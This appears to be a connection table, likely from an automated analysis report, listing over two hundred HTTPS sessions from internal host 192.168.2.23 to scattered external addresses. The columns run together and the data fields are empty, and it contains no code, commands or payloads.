                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16594192.168.2.234572476.16.52.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16595192.168.2.23327928.113.146.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16596192.168.2.2342530171.89.201.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16597192.168.2.233364075.87.185.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16598192.168.2.2350880113.124.99.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16599192.168.2.2357554122.194.89.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16600192.168.2.233829885.133.62.233443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16601192.168.2.2355100123.234.7.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16602192.168.2.235774461.55.228.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16603192.168.2.2348202150.33.221.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16604192.168.2.234149612.13.98.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16605192.168.2.236091446.65.79.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16606192.168.2.2359898102.180.18.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16607192.168.2.235187487.165.47.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16608192.168.2.234311662.247.154.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16609192.168.2.2356968190.96.110.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16610192.168.2.235329866.195.227.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16611192.168.2.2347038171.78.223.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16612192.168.2.2339388138.237.102.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16613192.168.2.234321649.25.2.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16614192.168.2.234025290.43.176.225443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16615192.168.2.233502849.136.26.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16616192.168.2.2334712105.255.60.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16617192.168.2.2340440204.96.124.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16618192.168.2.2356250137.78.82.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16619192.168.2.235935813.196.23.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16620192.168.2.2354448132.229.218.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16621192.168.2.235365054.136.143.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16622192.168.2.235201061.253.162.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16623192.168.2.2345044142.129.33.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16624192.168.2.2348956194.120.158.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16625192.168.2.2355724164.157.200.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16626192.168.2.2351672217.3.222.126443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16627192.168.2.235397213.60.60.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16628192.168.2.235856478.107.180.142443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16629192.168.2.2338354146.129.89.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16630192.168.2.2340502150.179.63.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16631192.168.2.235009498.250.15.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16632192.168.2.2358478169.6.154.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16633192.168.2.234681689.35.4.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16634192.168.2.2359996178.91.16.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16635192.168.2.233681813.59.105.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16636192.168.2.234585463.253.185.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16637192.168.2.2342770204.187.69.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16638192.168.2.2347506120.84.42.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16639192.168.2.2347082132.218.169.135443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16640192.168.2.233741025.103.9.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16641192.168.2.235745694.128.149.180443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16642192.168.2.233373880.123.231.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16643192.168.2.23346869.5.175.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16644192.168.2.2350076164.227.185.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16645192.168.2.2351480115.20.162.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16646192.168.2.234005657.100.221.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16647192.168.2.233862017.84.103.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16648192.168.2.2343966101.247.16.232443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16649192.168.2.2338244139.158.98.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16650192.168.2.235970882.214.71.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16651192.168.2.233572432.254.54.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16652192.168.2.2345264194.65.38.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16653192.168.2.2339902217.198.202.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16654192.168.2.2342600155.127.86.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16655192.168.2.2347294169.84.93.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16656192.168.2.234278463.108.122.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16657192.168.2.2356286171.246.123.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16658192.168.2.234602678.174.255.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16659192.168.2.23431584.143.249.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16660192.168.2.2348082210.55.221.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16661192.168.2.2351390190.119.187.110443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16662192.168.2.2355350165.166.253.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16663192.168.2.2337538130.129.228.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16664192.168.2.234860060.18.173.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16665192.168.2.2336590146.216.82.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16666192.168.2.235159225.221.118.4443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16667192.168.2.2344244138.147.133.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16668192.168.2.235555452.168.219.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16669192.168.2.2360886186.59.90.192443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16670192.168.2.233578876.245.98.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16671192.168.2.234908293.10.167.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16672192.168.2.234051287.167.115.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16673192.168.2.2360188146.76.208.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16674192.168.2.235460477.204.210.149443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16675192.168.2.233571639.47.165.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16676192.168.2.234776235.30.75.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16677192.168.2.2350818190.183.230.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16678192.168.2.2357406139.214.50.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16679192.168.2.233528242.148.252.146443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16680192.168.2.2354464213.79.244.138443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16681192.168.2.235476851.80.52.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16682192.168.2.2356864100.175.9.52443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16683192.168.2.2358206158.64.43.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16684192.168.2.2347830206.73.36.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16685192.168.2.235043271.36.32.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16686192.168.2.2353290194.227.164.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16687192.168.2.233730873.15.86.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16688192.168.2.233604620.78.111.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16689192.168.2.234397878.155.141.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16690192.168.2.235113460.8.133.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16691192.168.2.234487220.6.0.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16692192.168.2.2358166108.118.24.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16693192.168.2.2357892177.145.95.113443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16694192.168.2.234342643.185.153.119443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16695192.168.2.2341202162.90.121.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16696192.168.2.2358646193.75.3.184443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16697192.168.2.233598827.193.102.162443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16698192.168.2.2352614158.228.157.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16699192.168.2.23360088.137.132.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16700192.168.2.234385866.253.14.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16701192.168.2.235292266.74.220.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16702192.168.2.233414292.120.80.164443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16703192.168.2.23565605.10.224.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16704192.168.2.2351198187.186.229.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16705192.168.2.2333050199.246.152.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16706192.168.2.2333838159.137.50.104443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16707192.168.2.2334366130.179.160.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16708192.168.2.2334596222.196.216.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16709192.168.2.2337616173.186.97.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16710192.168.2.235359839.92.67.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16711192.168.2.234409031.41.231.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16712192.168.2.2344650142.7.223.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16713192.168.2.234599074.30.154.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16714192.168.2.2351604138.66.115.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16715192.168.2.2334292114.237.235.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16716192.168.2.23386009.203.154.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16717192.168.2.235063262.118.245.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16718192.168.2.235283893.223.42.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16719192.168.2.2346038138.50.173.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16720192.168.2.2349752151.140.225.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16721192.168.2.233993424.19.255.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16722192.168.2.234685092.38.74.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16723192.168.2.2353068209.16.73.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16724192.168.2.2355770137.62.249.62443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16725192.168.2.235232090.136.37.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16726192.168.2.234227476.193.117.68443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16727192.168.2.23432261.158.112.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16728192.168.2.2339182166.132.63.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16729192.168.2.234263667.33.248.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16730192.168.2.2342926118.120.28.55443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16731192.168.2.2354758165.11.33.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16732192.168.2.235059019.12.22.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16733192.168.2.2352026171.31.149.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16734192.168.2.234929498.187.3.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16735192.168.2.236033889.91.94.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16736192.168.2.2346910203.35.149.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16737192.168.2.2352600102.72.17.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16738192.168.2.2353830102.8.60.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16739192.168.2.234514477.46.149.226443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16740192.168.2.2355624190.151.120.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16741192.168.2.2336590197.229.201.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16742192.168.2.2341704158.9.221.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16743192.168.2.233772413.150.99.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16744192.168.2.2350832117.172.8.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16745192.168.2.2334828145.45.13.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16746192.168.2.235684253.13.129.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16747192.168.2.2358022164.112.44.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16748192.168.2.2334258163.8.251.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16749192.168.2.2338510120.241.207.191443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16750192.168.2.2358746216.58.54.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16751192.168.2.235826869.226.147.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16752192.168.2.2354560189.245.66.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16753192.168.2.235119623.93.78.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16754192.168.2.233792814.18.68.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16755192.168.2.2352150107.119.95.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16756192.168.2.233879859.139.235.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16757192.168.2.2339440102.217.138.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16758192.168.2.234096888.105.16.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16759192.168.2.2353122208.39.117.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16760192.168.2.23456081.186.142.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16761192.168.2.2358434110.209.240.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16762192.168.2.235298865.40.183.53443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16763192.168.2.2354580163.161.128.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16764192.168.2.234863274.154.110.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16765192.168.2.2357538135.238.163.23443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16766192.168.2.233657818.199.130.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16767192.168.2.235087294.115.252.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16768192.168.2.234357693.56.129.197443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16769192.168.2.2348412199.35.29.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16770192.168.2.2354934143.104.212.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16771192.168.2.2357346135.108.132.0443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16772192.168.2.2353856118.130.114.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16773192.168.2.2350492171.187.107.90443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16774192.168.2.2358318216.242.79.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16775192.168.2.2344820192.188.65.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16776192.168.2.2348824159.76.88.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16777192.168.2.234368265.37.54.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16778192.168.2.2360054109.100.225.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16779192.168.2.233920450.5.77.12443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16780192.168.2.2344496131.63.154.243443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16781192.168.2.2333562197.146.180.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16782192.168.2.234789234.134.79.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16783192.168.2.2357244110.186.133.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16784192.168.2.2355992218.205.214.101443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16785192.168.2.2339780147.120.127.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16786192.168.2.234353280.149.113.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16787192.168.2.2350488151.105.228.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16788192.168.2.2339894179.43.118.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16789192.168.2.235230820.248.198.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16790192.168.2.235204412.129.38.205443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16791192.168.2.2352506192.29.50.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16792192.168.2.2358304148.55.149.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16793192.168.2.2351464179.178.98.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16794192.168.2.2351700120.81.158.177443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16795192.168.2.235633852.185.58.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16796192.168.2.2354502194.153.248.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16797192.168.2.2346122180.192.152.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16798192.168.2.2353752101.162.83.14443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16799192.168.2.2333020129.3.104.174443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16800192.168.2.2337828141.183.32.163443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16801192.168.2.2355396134.100.161.102443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16802192.168.2.2338136170.53.51.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16803192.168.2.2351440151.133.167.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16804192.168.2.2352760218.10.59.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16805192.168.2.2341988122.74.210.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16806192.168.2.2348578165.71.204.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16807192.168.2.233454477.95.116.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16808192.168.2.2353236139.179.139.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16809192.168.2.2333954152.122.212.32443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16810192.168.2.2357520190.189.115.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16811192.168.2.233496293.212.139.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16812192.168.2.2355304191.117.157.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16813192.168.2.2348954185.137.204.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16814192.168.2.234145612.175.194.247443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                16815192.168.2.2360402176.141.226.145443
